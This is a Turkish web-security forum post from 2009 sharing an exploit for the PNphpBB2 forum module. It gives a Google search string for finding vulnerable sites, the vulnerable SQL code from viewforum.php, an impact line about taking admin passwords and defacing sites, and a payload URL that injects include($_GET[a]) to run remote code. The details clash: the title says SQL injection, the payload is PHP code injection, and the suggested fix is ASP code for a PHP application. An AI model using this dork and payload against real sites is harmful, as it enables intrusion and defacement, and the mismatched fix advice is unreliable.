İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

remote SQL İnjection

05-06-2009 10:20
#1
atlas_tr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2008
Nereden:
NErDe OLsam BEğeNİRsin
Mesajlar:
2.383
Teşekkür (Etti):
19
Teşekkür (Aldı):
189
Konular:
389
Ticaret:
(0) %
Exploit
Code:
< ------------------- header data start ------------------- >

################################################## ###########

# Application Name : PNphpBB2 Remote SQL Inj.

# Vulnerable Type : SQL Injection

# Google Keyword : Powered by PNphpBB2 1.2i © 2003-2004 PNphpBB Group

# Infection : Yönetici bilgileride dahil olmak üzere veritabanındaki tüm verilere erişim sağlanabilir. Elde edilen Yönetici şifresi ile sisteme giriş yapılarak haber vb. içerik eklemek suretiyle ilgili site ana sayfası yönlendirilerek hack edilebilir.

# Bug Fix Advice : id değişkeni sadece Integer değer alacak şekilde düzenlenmelidir.
İlgili Güvenlik açığının kapatılması için Örnek Kod: id = Cint(Request.QueryString(id))

# author : Bug Researchers

################################################## ###########

< ------------------- header data end of ------------------- >



< -- bug code start -- >

viewforum.php ;

387 if ( isset($HTTP_GET_VARS[’order’]) || isset($HTTP_POST_VARS[’order’]) )
388 {
389 $sort_order = isset($HTTP_GET_VARS[’order’]) ? $HTTP_GET_VARS[’order’] : $HTTP_POST_VARS[’order’];
390 }

415 $sql = select t.*, u.username, u.user_id, u2.username as user2, u2.user_id as id2, p.post_username, p2.post_username AS post_username2, p2.post_time
416 FROM . TOPICS_TABLE . t, . USERS_TABLE . u, . POSTS_TABLE . p, . POSTS_TABLE . p2, . USERS_TABLE . u2
417 where t.forum_id = $forum_id
418 AND t.topic_poster = u.user_id
419 AND p.post_id = t.topic_first_post_id
420 AND p2.post_id = t.topic_last_post_id
421 AND u2.user_id = p2.poster_id
422 AND t.topic_type <> . POST_ANNOUNCE .
423 $limit_topics_time
424 ORDER BY t.topic_type DESC, $sort_method $sort_order
425 LIMIT $start, .$board_config[’topics_per_page’];


/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fd fc692/&highlight=’.include($_GET[a]),exit.’&a=[evil c0de]

< -- bug code end of -- >
Kullanıcı İmzası


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı